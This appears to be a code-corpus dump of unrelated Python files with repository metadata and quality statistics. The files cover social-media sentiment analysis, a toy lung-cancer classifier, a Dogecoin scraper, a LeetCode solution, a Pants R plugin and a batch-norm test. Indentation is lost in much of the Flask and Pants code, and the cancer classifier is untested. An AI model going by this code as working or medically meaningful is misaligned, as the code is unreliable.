sid = SentimentIntensityAnalyzer()
neg=0
neu=0
pos=0
compound=0
for sentence in data:
ss = sid.polarity_scores(sentence)
neg = neg+ float(ss['neg'])
neu = neu +float(ss['neu'])
pos = pos + float(ss['pos'])
compound = compound+float(ss['compound'])
total=neg+neu+pos+compound
negative=(neg/total)*100
neutral=(neu/total)*100
positive=(pos/total)*100
compound=((compound/total)*100)
if negative > neutral and negative > positive and negative > compound:
greatest=negative
great="Highest Polarity is of Negative"
if neutral > positive and neutral > negative and neutral > compound:
greatest=neutral
great="Highest Polarity is of Neutral"
if positive > neutral and positive > negative and positive > compound:
greatest=positive
great="Highest Polarity is of Positive"
        if compound > neutral and compound > negative and compound > positive:
            greatest=compound
            great="Highest Polarity is of Compound"
greatest= float("{0:.2f}".format(greatest))
driver.close()
return render_template('facebook_output.html',negg=negative,poss=positive,neuu=neutral,compp=compound,great_per=greatest,str_var=great)
print("ok")
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("facebook_output.html",error=titleshow,condition=err)
@app.route('/datacoming_twitter', methods=['POST'])
def data_twitter():
try:
CONSUMER_KEY = '--'
CONSUMER_SECRET = '--'
ACCESS_TOKEN = '--'
ACCESS_SECRET = '--'
def twitter_setup():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
return api
# We create an extractor object:
extractor = twitter_setup()
SearchName=request.form['tw_username']
tweets = extractor.user_timeline(screen_name="@"+SearchName, count=200)
length_tweets=str(len(tweets))
data = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweets'])
data['len'] = np.array([len(tweet.text) for tweet in tweets])
data['ID'] = np.array([tweet.id for tweet in tweets])
data['Date'] = np.array([tweet.created_at for tweet in tweets])
data['Source'] = np.array([tweet.source for tweet in tweets])
data['Likes'] = np.array([tweet.favorite_count for tweet in tweets])
data['RTs'] = np.array([tweet.retweet_count for tweet in tweets])
mean = np.mean(data['len'])
fav_max = np.max(data['Likes'])
rt_max = np.max(data['RTs'])
fav = data[data.Likes == fav_max].index[0]
rt = data[data.RTs == rt_max].index[0]
liked_tweet=data['Tweets'][fav]
retweets=data['Tweets'][rt]
sources = []
for source in data['Source']:
if source not in sources:
sources.append(source)
def clean_tweet(tweet):
"""
Utility function to clean the text in a tweet by removing
links and special characters using regex.
"""
            return ' '.join(re.sub(r"(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def analize_sentiment(tweet):
"""
Utility function to classify the polarity of a tweet
using textblob
"""
analysis = TextBlob(clean_tweet(tweet))
if analysis.sentiment.polarity > 0:
return 1
elif analysis.sentiment.polarity == 0:
return 0
else:
return -1
data['SA'] = np.array([ analize_sentiment(tweet) for tweet in data['Tweets'] ])
pos_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] > 0]
neu_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] == 0]
neg_tweets = [ tweet for index, tweet in enumerate(data['Tweets']) if data['SA'][index] < 0]
pos_Percent=len(pos_tweets)/len(data['Tweets'])*100
neu_Percent=len(neu_tweets)/len(data['Tweets'])*100
neg_Percent=len(neg_tweets)/len(data['Tweets'])*100
if pos_Percent > neu_Percent and pos_Percent > neg_Percent:
greatest=pos_Percent
great="Highest Polarity is of Positive"
if neu_Percent > pos_Percent and neu_Percent > neg_Percent:
greatest=neu_Percent
great="Highest Polarity is of Neutral"
        if neg_Percent > pos_Percent and neg_Percent > neu_Percent:
            greatest=neg_Percent
            great="Highest Polarity is of Negative"
greatest= float("{0:.2f}".format(greatest))
return render_template('twitter_output.html',twit_src=sources,likeTweet=liked_tweet,retweet=retweets,pos=pos_Percent,neg=neg_Percent,neu=neu_Percent,great_per=greatest,str_var=great)
print("ok")
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("twitter_output.html",error=titleshow,condition=err)
@app.route('/cancer')
def cancer():
return render_template('cancer.html')
@app.route('/cancerPredict', methods=['POST'])
def cancerPredict():
age=float(request.form['age'])
gender=float(request.form['gender'])
air=float(request.form['values'])
alch=float(request.form['values1'])
dust=float(request.form['values2'])
occp=float(request.form['values3'])
gene=float(request.form['values4'])
ldesc=float(request.form['values5'])
diet=float(request.form['values6'])
obsty=float(request.form['values7'])
smoke=float(request.form['values8'])
psmoke=float(request.form['values9'])
chest=float(request.form['values10'])
cough=float(request.form['values11'])
fatig=float(request.form['values12'])
weight=float(request.form['values13'])
breath=float(request.form['values14'])
wheez=float(request.form['values15'])
swallow=float(request.form['values16'])
nails=float(request.form['values17'])
cold=float(request.form['values18'])
dcough=float(request.form['values19'])
snore=float(request.form['values20'])
data=pa.read_excel("cancer_patient_data_sets .xlsx").values
#print(data)
#print(data[0,1:24])
train_data=data[0:998,1:24]
train_target=data[0:998,24]
'''print(train_target)
test_data=data[999:,1:24]
test_target=data[999:,24]
print(test_target)'''
clf=DecisionTreeClassifier()
trained=clf.fit(train_data,train_target)
clf1=SVC()
trained1=clf1.fit(train_data,train_target)
clf2=KNeighborsClassifier(n_neighbors=3)
trained2=clf2.fit(train_data,train_target)
test=[age,gender,air,alch,dust,occp,gene,ldesc,diet,obsty,smoke,psmoke,chest,cough,fatig,weight,breath,wheez,swallow,nails,cold,dcough,snore]
#test=[34,1,2,3,4,5,6,7,6,5,4,3,2,1,2,3,4,5,2,3,5,2,3]
predicted=trained.predict([test])
predicted1=trained1.predict([test])
predicted2=trained2.predict([test])
print(predicted)
print(predicted1)
print(predicted2)
#print(test_target)
'''
acc=accuracy_score(predicted,test_target)
print(acc)
acc1=accuracy_score(predicted1,test_target)
print(acc)
acc2=accuracy_score(predicted2,test_target)
print(acc)
'''
#print(train_target)
#print(age,gender,air,alch,dust,occp,gene,ldesc,diet,obsty,smoke,psmoke,chest,cough,fatig,weight,breath,wheez,swallow,nails,cold,dcough,snore)
#return render_template("cancer.html",predicted=predicted,predicted1=predicted1,predicted2=predicted2)
if __name__ == '__main__':
app.run("127.0.0.1",5000,debug=True)
avg_line_length: 37.90407 | max_line_length: 190 | alphanum_fraction: 0.638162
qsc_code_*_quality_signal columns:
num_words: 1,637 | num_chars: 13,039 | mean_word_length: 4.976176 | frac_words_unique: 0.221747
frac_chars_top_2grams: 0.035109 | top_3grams: 0.045176 | top_4grams: 0.029708
frac_chars_dupe_5grams: 0.420329 | dupe_6grams: 0.359808 | dupe_7grams: 0.332065 | dupe_8grams: 0.312546 | dupe_9grams: 0.301743 | dupe_10grams: 0.279401
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.024531 | frac_chars_whitespace: 0.227778
size_file_byte: 13,039 | num_lines: 343 | num_chars_line_max: 191 | num_chars_line_mean: 38.014577
frac_chars_alphabet: 0.784487 | frac_chars_comments: 0.051461 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.310469 | cate_autogen: 0
frac_lines_long_string: 0.00361 | frac_chars_string_length: 0.129493 | frac_chars_long_word_length: 0.016552 | frac_lines_string_concat: 0.00361 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.046931 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.064982 | frac_lines_simplefunc: 0.018051 | score_lines_no_logic: 0.173285 | frac_lines_print: 0.021661
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 5 | hexsha: 888504477ef926e05cac253422a2f5fcc1a109ea | size: 4,031 | ext: py | lang: Python
repo_path: main.py | repo_name: sun624/Dogecoin_musk | head_hexsha: 6dc48f03275321d29bb1ab131ecd14626bcc5170 | licenses: ["MIT"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count, max_issues_count, max_forks_count: all null (all event datetimes: null)
content:
#!/usr/bin/env python3
from os import times
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
import requests
import pandas as pd
import json
import time
import math
from twitter import get_coin_tweets_dates
# BeautifulSoup cannot scrape dynamically changing webpages on its own,
# so we use the third-party library Selenium and its webdrivers instead.
def convert_date_to_unixtime(year,month,day):
dt = datetime.datetime(year,month,day)
timestamp = (dt - datetime.datetime(1970,1,1)).total_seconds()
return round(timestamp)
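# For example (added for illustration): convert_date_to_unixtime(2021, 1, 1)
# returns 1609459200, the seconds between the 1970-01-01 epoch and 2021-01-01,
# both interpreted as timezone-naive datetimes.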
def date_parser(date):
return datetime.datetime.strptime(date, '%b %d, %Y').date()
def is_valid(s):
return len(s) > 1
def scraping_data(y1,m1,d1,y2,m2,d2,coin):
DAYS_PER_SCROLL = 100
SECONDS_PER_DAY = 86400
start_date = convert_date_to_unixtime(y1,m1,d1)
end_date = convert_date_to_unixtime(y2,m2,d2)
url = f'https://finance.yahoo.com/quote/{coin}-USD/history?period1={start_date}&period2={end_date}&interval=1d&filter=history&frequency=1d&includeAdjustedClose=true'
# initiating the webdriver. Parameter includes the path of the webdriver.
chrome_options = Options()
# run chrome without GUI
chrome_options.headless = True
chrome_options.add_argument("--log-level=3")
driver = webdriver.Chrome(executable_path='./chromedriver',options = chrome_options)
driver.get(url)
html = driver.find_element_by_tag_name('html')
#Webdriver press ESC to stop loading the page
html.send_keys(Keys.ESCAPE)
days_between = (end_date - start_date) / SECONDS_PER_DAY
scroll = math.ceil(days_between / DAYS_PER_SCROLL)
for i in range(scroll):
soup = BeautifulSoup(driver.page_source,'html.parser')
dates = []
prices = []
# extract date and price information
for tr in soup.tbody.contents:
#Navigable string is not callable
date_source = tr.contents[0]
#convert navigable string into callable string
date_string = str(date_source.string)
date = date_parser(date_string)
price = tr.contents[4].string
if is_valid(price):
dates.insert(0,date)
prices.insert(0,float(price.replace(',','')))
        #webdriver presses the END key to scroll down to the bottom of the page and load more data
html.send_keys(Keys.END)
WebDriverWait(driver,timeout=0.5)
time.sleep(0.3)
driver.close()
return [dates,prices]
"""
draw coin price fluctuation with Elon's tweet
"""
def draw(dates,prices,coin,tw_dates):
fig, ax = plt.subplots()
#set graph size 12inch by 10inch
fig.set_size_inches((12, 10))
    #draw first graph---coin price and date
ax.plot(dates, prices,label='coin price')
tw_prices = []
for tw_date in tw_dates:
index = dates.index(tw_date)
tw_prices.append(prices[index])
#draw second graph---Elon's tweet and date
ax.plot(tw_dates,tw_prices,'ro',label='Elon\'s Doge tweet' )
ax.xaxis.set_major_locator(mdates.AutoDateLocator())
ax.xaxis.set_minor_locator(mdates.DayLocator())
#auto rotate x axis ticks
fig.autofmt_xdate()
ax.grid(True)
plt.xlabel('Date')
plt.ylabel('Price')
plt.title(f'{coin} coin Price',loc='center')
plt.legend(loc='upper left')
plt.show()
def main():
start_time = time.time()
[dates,prices] = scraping_data(2021,1,1,2021,5,21,'DOGE')
tweet_dates = get_coin_tweets_dates('elonmusk')
draw(dates,prices,'DOGE',tweet_dates)
duration = time.time() - start_time
print(f'It took {duration}s to run this application.')
if __name__ == '__main__':
main()
avg_line_length: 29.210145 | max_line_length: 170 | alphanum_fraction: 0.690896
qsc_code_*_quality_signal columns:
num_words: 567 | num_chars: 4,031 | mean_word_length: 4.767196 | frac_words_unique: 0.412698
frac_chars_top_2grams: 0.024417 | top_3grams: 0.031077 | top_4grams: 0.023307
frac_chars_dupe_5grams: 0.018498 | dupe_6grams: 0 | dupe_7grams: 0 | dupe_8grams: 0 | dupe_9grams: 0 | dupe_10grams: 0
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.01962 | frac_chars_whitespace: 0.203423
size_file_byte: 4,031 | num_lines: 137 | num_chars_line_max: 171 | num_chars_line_mean: 29.423358
frac_chars_alphabet: 0.822174 | frac_chars_comments: 0.151823 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.023529 | cate_autogen: 0
frac_lines_long_string: 0.011765 | frac_chars_string_length: 0.10009 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.070588 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.211765 | frac_lines_simplefunc: 0.023529 | score_lines_no_logic: 0.329412 | frac_lines_print: 0.011765
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 6 | hexsha: 88858e6eec8ef3e573592e88fd8baa705aa1f430 | size: 1,264 | ext: py | lang: Python
repo_path: 064_minimum_path_sum.py | repo_name: gengwg/leetcode | head_hexsha: 0af5256ec98149ef5863f3bba78ed1e749650f6e | licenses: ["Apache-2.0"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count: 2 (stars events 2018-04-24T19:17:40.000Z to 2018-04-24T19:33:52.000Z) | max_issues_count: null (issues event datetimes: null) | max_forks_count: 3 (forks events 2020-06-17T05:48:52.000Z to 2021-01-02T06:08:25.000Z)
content:
"""
64. Minimum Path Sum
Given an m x n grid filled with non-negative numbers,
find a path from top left to bottom right
which minimizes the sum of all numbers along its path.
Note: You can only move either down or right at any point in time.
http://www.tangjikai.com/algorithms/leetcode-64-minimum-path-sum
Dynamic Programming
We can use a two-dimensional array
to record the minimum sum at each position of grid,
finally return the last element as output.
"""
class Solution(object):
def minPathSum(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
n = len(grid[0])
dp = [[0] * n for _ in range(m)]
for i in range(m):
for j in range(n):
# first element is first element in grid
if i == 0 and j == 0:
dp[i][j] = grid[0][0]
elif i == 0: # first column
dp[i][j] = dp[i][j - 1] + grid[i][j]
elif j == 0: # first row
dp[i][j] = dp[i - 1][j] + grid[i][j]
else: # either top or left sum plus current position
dp[i][j] = min(dp[i - 1][j], dp[i][j - 1]) + grid[i][j]
return dp[-1][-1]
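# Usage sketch added for illustration (the grid below is the standard LeetCode
# example for this problem, not part of the original file):
if __name__ == '__main__':
    grid = [[1, 3, 1],
            [1, 5, 1],
            [4, 2, 1]]
    # Minimum path 1 -> 3 -> 1 -> 1 -> 1 sums to 7
    print(Solution().minPathSum(grid))  # 7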
avg_line_length: 29.395349 | max_line_length: 75 | alphanum_fraction: 0.530854
qsc_code_*_quality_signal columns:
num_words: 199 | num_chars: 1,264 | mean_word_length: 3.366834 | frac_words_unique: 0.472362
frac_chars_top_2grams: 0.026866 | top_3grams: 0.035821 | top_4grams: 0.047761
frac_chars_dupe_5grams: 0.050746 | dupe_6grams: 0.035821 | dupe_7grams: 0.035821 | dupe_8grams: 0.035821 | dupe_9grams: 0 | dupe_10grams: 0
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.021845 | frac_chars_whitespace: 0.348101
size_file_byte: 1,264 | num_lines: 42 | num_chars_line_max: 76 | num_chars_line_mean: 30.095238
frac_chars_alphabet: 0.791262 | frac_chars_comments: 0.478639 | cate_xml_start: 0 | frac_lines_dupe_lines: 0 | cate_autogen: 0
frac_lines_long_string: 0 | frac_chars_string_length: 0 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.0625 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.1875 | frac_lines_print: 0
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 7 | hexsha: 8886118689d4c63bf084bbb40abe034f4a2125d5 | size: 12,507 | ext: py | lang: Python
repo_path: pants-plugins/structured/subsystems/r_distribution.py | repo_name: cosmicexplorer/structured | head_hexsha: ea452a37e265dd75d4160efa59a4a939bf8c0521 | licenses: ["Apache-2.0"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count, max_issues_count, max_forks_count: all null (all event datetimes: null)
content:
# coding=utf-8
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import re
import subprocess
import sys
from contextlib import contextmanager
from abc import abstractproperty
from pants.binaries.binary_util import BinaryUtil
from pants.engine.isolated_process import ExecuteProcessRequest, ExecuteProcessResult
from pants.fs.archive import TGZ
from pants.subsystem.subsystem import Subsystem
from pants.util.contextutil import environment_as, temporary_file_path
from pants.util.dirutil import safe_mkdir
from pants.util.memo import memoized_method, memoized_property
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
from pants.util.strutil import ensure_binary
logger = logging.getLogger(__name__)
class RDependency(AbstractClass):
@abstractproperty
def name(self):
"""???"""
class RInvocationException(Exception):
INVOCATION_ERROR_BOILERPLATE = "`{cmd}` failed: {what_happened}"
def __init__(self, cmd, what_happened):
msg = self.INVOCATION_ERROR_BOILERPLATE.format(
cmd=' '.join(cmd),
what_happened=what_happened,
)
super(RInvocationException, self).__init__(msg)
class RSpawnFailure(RInvocationException):
def __init__(self, cmd, err):
super(RSpawnFailure, self).__init__(cmd=cmd, what_happened=repr(err))
class RProcessResultFailure(RInvocationException):
PROCESS_RESULT_FAILURE_BOILERPLATE = "exited non-zero ({exit_code}){rest}"
def __init__(self, cmd, exit_code, rest=''):
what_happened = self.PROCESS_RESULT_FAILURE_BOILERPLATE.format(
exit_code=exit_code,
rest=rest,
)
super(RProcessResultFailure, self).__init__(
cmd=cmd, what_happened=what_happened)
class RProcessInvokedForOutputFailure(RProcessResultFailure):
INVOKE_OUTPUT_ERROR_BOILERPLATE = """
stdout:
{stdout}
stderr:
{stderr}
"""
def __init__(self, cmd, exit_code, stdout, stderr):
rest = self.INVOKE_OUTPUT_ERROR_BOILERPLATE.format(
stdout=stdout,
stderr=stderr,
)
super(RProcessInvokedForOutputFailure, self).__init__(
cmd=cmd, exit_code=exit_code, rest=rest)
class RDistribution(object):
DEVTOOLS_CRAN_NAME = 'devtools'
MODULES_GITHUB_ORG_NAME = 'klmr'
MODULES_GITHUB_REPO_NAME = 'modules'
class Factory(Subsystem):
options_scope = 'r-distribution'
@classmethod
def subsystem_dependencies(cls):
return super(RDistribution.Factory, cls).subsystem_dependencies() + (
BinaryUtil.Factory,
)
@classmethod
def register_options(cls, register):
super(RDistribution.Factory, cls).register_options(register)
register('--r-version', fingerprint=True,
help='R distribution version. Used as part of the path to '
'lookup the distribution with --binary-util-baseurls and '
'--pants-bootstrapdir.',
default='3.4.3')
register('--modules-git-ref', fingerprint=True,
help='git ref of the klmr/modules repo to use for R modules.',
default='d4199f2d216c6d20c3b092c691d3099c3325f2a3')
register('--tools-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for downloaded R tools. '
'If unspecified, a standard path under the workdir is '
'used.')
register('--resolver-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for resolved R packages. '
'If unspecified, a standard path under the workdir is '
'used.')
register('--chroot-cache-dir', advanced=True, metavar='<dir>',
default=None,
help='The parent directory for the chroot cache. '
'If unspecified, a standard path under the workdir is '
'used.')
@memoized_property
def scratch_dir(self):
return os.path.join(
self.get_options().pants_workdir, *self.options_scope.split('.'))
def create(self):
binary_util = BinaryUtil.Factory.create()
options = self.get_options()
tools_cache_dir = options.tools_cache_dir or os.path.join(
self.scratch_dir, 'tools')
resolver_cache_dir = options.resolver_cache_dir or os.path.join(
self.scratch_dir, 'resolved_packages')
chroot_cache_dir = options.chroot_cache_dir or os.path.join(
self.scratch_dir, 'chroots')
return RDistribution(
binary_util,
r_version=options.r_version,
modules_git_ref=options.modules_git_ref,
tools_cache_dir=tools_cache_dir,
resolver_cache_dir=resolver_cache_dir,
chroot_cache_dir=chroot_cache_dir,
)
def __init__(self, binary_util, r_version, modules_git_ref, tools_cache_dir,
resolver_cache_dir, chroot_cache_dir):
self._binary_util = binary_util
self._r_version = r_version
self.modules_git_ref = modules_git_ref
self.tools_cache_dir = tools_cache_dir
self.resolver_cache_dir = resolver_cache_dir
self.chroot_cache_dir = chroot_cache_dir
def _unpack_distribution(self, supportdir, r_version, output_filename):
logger.debug('unpacking R distribution, version: %s', r_version)
tarball_filepath = self._binary_util.select_binary(
supportdir=supportdir, version=r_version, name=output_filename)
logger.debug('Tarball for %s(%s): %s', supportdir, r_version, tarball_filepath)
work_dir = os.path.join(os.path.dirname(tarball_filepath), 'unpacked')
TGZ.extract(tarball_filepath, work_dir, concurrency_safe=True)
return work_dir
@memoized_property
def r_installation(self):
r_dist_path = self._unpack_distribution(
supportdir='bin/R', r_version=self._r_version, output_filename='r.tar.gz')
return r_dist_path
@memoized_property
def r_bin_dir(self):
return os.path.join(self.r_installation, 'bin')
R_SAVE_IMAGE_BOILERPLATE = """{initial_input}
save.image(file='{save_file_path}', safe=FALSE)
"""
RDATA_FILE_NAME = '.Rdata'
def r_invoke_isolated_process(self, context, cmd):
logger.debug("isolated process '{}'".format(cmd))
env_path = ['PATH', self.r_bin_dir]
req = ExecuteProcessRequest(tuple(cmd), env_path)
res, = context._scheduler.product_request(
ExecuteProcessResult, [req])
if res.exit_code != 0:
raise RProcessInvokedForOutputFailure(
cmd, res.exit_code, res.stdout, res.stderr)
return res
@contextmanager
def r_isolated_invoke_with_input(self, context, stdin_input, suffix='.R'):
logger.debug("isolated invoke with stdin_input:\n{}".format(stdin_input))
with temporary_file_path(suffix=suffix) as tmp_file_path:
with open(tmp_file_path, 'w') as tmpfile:
tmpfile.write(stdin_input)
yield tmp_file_path
def r_invoke_repl_sandboxed(self, workunit, cmd, cwd):
new_path = ':'.join([
self.r_bin_dir,
os.environ.get('PATH'),
])
with environment_as(PATH=new_path):
try:
subproc = subprocess.Popen(
cmd,
stdin=sys.stdin,
stdout=workunit.output('stdout'),
stderr=workunit.output('stderr'),
cwd=cwd,
)
return subproc.wait()
except OSError as e:
raise RSpawnFailure(cmd, e)
except subprocess.CalledProcessError as e:
raise RProcessResultFailure(cmd, e.returncode, e)
def invoke_r_interactive(self, context, workunit, initial_input, chroot_dir,
clean_chroot=False):
logger.debug("interactive in '{}', initial_input: '{}'".format(
chroot_dir, initial_input))
rdata_path = os.path.join(chroot_dir, self.RDATA_FILE_NAME)
input_with_save = self.R_SAVE_IMAGE_BOILERPLATE.format(
initial_input=initial_input,
save_file_path=rdata_path,
)
safe_mkdir(chroot_dir, clean=clean_chroot)
with self.r_isolated_invoke_with_input(
context, input_with_save) as tmp_file_path:
save_cmd = [
'R',
'--vanilla',
'--slave',
'--file={}'.format(tmp_file_path)
]
self.r_invoke_isolated_process(context, save_cmd)
r_cmd = [
'R',
'--save',
'--restore',
'--interactive',
]
return self.r_invoke_repl_sandboxed(workunit, r_cmd, chroot_dir)
def invoke_rscript(self, context, stdin_input):
with self.r_isolated_invoke_with_input(
context, stdin_input) as tmp_file_path:
r_cmd = [
'Rscript',
'--verbose',
tmp_file_path,
]
return self.r_invoke_isolated_process(context, r_cmd)
class PackageInfoFormatError(Exception):
"""???"""
  BLANK_LINE_REGEX = re.compile(r'^\s*$')
@classmethod
def is_valid_package_name(cls, name):
return cls.BLANK_LINE_REGEX.match(name) is None
@classmethod
def check_valid_package_name(cls, name):
if not cls.is_valid_package_name(name):
raise PackageInfoFormatError(
"'{}' is not a valid package name (must not be blank)".format(name))
return name
@classmethod
def filter_packages_lines_stdout(cls, lines):
return [p for p in lines if cls.is_valid_package_name(p)]
  VALID_VERSION_REGEX = re.compile(r'^[0-9]+(\.[0-9]+)*$')
@classmethod
def is_valid_version(cls, version):
if version is None:
return True
return cls.VALID_VERSION_REGEX.match(version) is not None
@classmethod
def check_valid_version(cls, version):
if not cls.is_valid_version(version):
raise PackageInfoFormatError(
"'{}' is not a valid package version "
"(must be 'None' or match '{}')"
.format(version, cls.VALID_VERSION_REGEX.pattern))
return version
@classmethod
def gen_script_load_stmts(cls, srcs_rel):
if len(srcs_rel) == 0:
return ''
source_stmts = ["source('{}')".format(s.encode('ascii')) for s in srcs_rel]
return '\n'.join(source_stmts) + '\n'
@classmethod
def convert_to_list_of_ascii(cls, arg):
if not isinstance(arg, list):
arg = [ensure_binary(arg)]
return [ensure_binary(x) for x in arg]
@classmethod
def create_valid_r_charvec_input(cls, elements, drop_empty=False):
elements = cls.convert_to_list_of_ascii(elements)
if len(elements) == 0:
if drop_empty:
return None
return 'character(0)'
elif len(elements) == 1:
return "'{}'".format(elements[0])
quoted = ["'{}'".format(el) for el in elements]
return "c({})".format(', '.join(quoted))
@classmethod
def gen_libs_input(cls, lib_paths):
libs_charvec = cls.create_valid_r_charvec_input(lib_paths, drop_empty=True)
if libs_charvec is None:
return ''
return ".libPaths({})".format(libs_charvec) + '\n'
R_LIST_PACKAGES_BOILERPLATE = """{libs_input}
cat(installed.packages(lib.loc={libs_joined})[,'Package'], sep='\\n')
"""
def get_installed_packages(self, context, lib_paths):
libs_input = self.gen_libs_input(lib_paths)
libs_charvec = self.create_valid_r_charvec_input(lib_paths, drop_empty=True)
if libs_charvec is None:
libs_charvec="NULL"
installed_packages_input = self.R_LIST_PACKAGES_BOILERPLATE.format(
libs_input=libs_input,
libs_joined=libs_charvec,
)
pkgs = self.invoke_rscript(context, installed_packages_input).stdout.split('\n')
return self.filter_packages_lines_stdout(pkgs)
# R_INSTALL_SOURCE_PACKAGE_BOILERPLATE = """???"""
# def gen_source_install_input(self, source_dir, outdir):
# return self.R_INSTALL_SOURCE_PACKAGE_BOILERPLATE.format(
# expr="devtools::install_local('{}', lib='{}')".format(
# source_dir, outdir),
# outdir=outdir,
# )
# def install_source_package(self, context, source_dir, pkg_cache_dir):
# source_input = self.gen_source_install_input(source_dir, pkg_cache_dir)
# self.invoke_rscript(context, source_input).stdout.split('\n')
def install_cran_package(self, cran, context, cran_dep, outdir):
cran_input = cran.gen_cran_install_input(cran_dep, outdir)
self.invoke_rscript(context, cran_input)
def install_github_package(self, github, context, github_dep, outdir):
github_input = github.gen_github_install_input(
self.tools_cache_dir, github_dep, outdir)
logger.debug("github_input: '{}'".format(github_input))
self.invoke_rscript(context, github_input).stdout.split('\n')
avg_line_length: 33.352 | max_line_length: 93 | alphanum_fraction: 0.691773
qsc_code_*_quality_signal columns:
num_words: 1,566 | num_chars: 12,507 | mean_word_length: 5.224138 | frac_words_unique: 0.184547
frac_chars_top_2grams: 0.026403 | top_3grams: 0.014301 | top_4grams: 0.008556
frac_chars_dupe_5grams: 0.210732 | dupe_6grams: 0.154504 | dupe_7grams: 0.1138 | dupe_8grams: 0.090331 | dupe_9grams: 0.071507 | dupe_10grams: 0.059039
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.004195 | frac_chars_whitespace: 0.199488
size_file_byte: 12,507 | num_lines: 374 | num_chars_line_max: 94 | num_chars_line_mean: 33.441176
frac_chars_alphabet: 0.812924 | frac_chars_comments: 0.040138 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.130137 | cate_autogen: 0
frac_lines_long_string: 0 | frac_chars_string_length: 0.121829 | frac_chars_long_word_length: 0.014686 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.10274 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.061644 | frac_lines_simplefunc: 0.017123 | score_lines_no_logic: 0.318493 | frac_lines_print: 0.010274
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 8 | hexsha: 88864f3fa8092982651eaeda9dbe085e135b834a | size: 5,121 | ext: py | lang: Python
repo_path: src/test.py | repo_name: yliuhz/PMAW | head_hexsha: 23f4f3ec2ccb381be3d4b2edea0878e4015e1ae4 | licenses: ["Apache-2.0"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count: 8 (stars events 2021-12-02T02:25:55.000Z to 2022-03-18T23:41:42.000Z) | max_issues_count: null (issues event datetimes: null) | max_forks_count: null (forks event datetimes: null)
content:
import torch
from torch import nn
import numpy as np
class convmodel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 16, 3, 1, padding=1, bias=False)
self.conv2 = nn.Conv2d(16, 32, 3, 1, padding=1, bias=False)
self.linear = nn.Linear(32*10*10, 1, bias=False)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.linear(x.view(x.size(0), -1))
return x
def batch_norm(X, gamma, beta, moving_mean, moving_var, eps, momentum):
# Use `is_grad_enabled` to determine whether the current mode is training
# mode or prediction mode
if not torch.is_grad_enabled():
# If it is prediction mode, directly use the mean and variance
# obtained by moving average
X_hat = (X - moving_mean) / torch.sqrt(moving_var + eps)
else:
assert len(X.shape) in (2, 4)
if len(X.shape) == 2:
# When using a fully-connected layer, calculate the mean and
# variance on the feature dimension
mean = X.mean(dim=0)
var = ((X - mean) ** 2).mean(dim=0)
else:
# When using a two-dimensional convolutional layer, calculate the
# mean and variance on the channel dimension (axis=1). Here we
# need to maintain the shape of `X`, so that the broadcasting
# operation can be carried out later
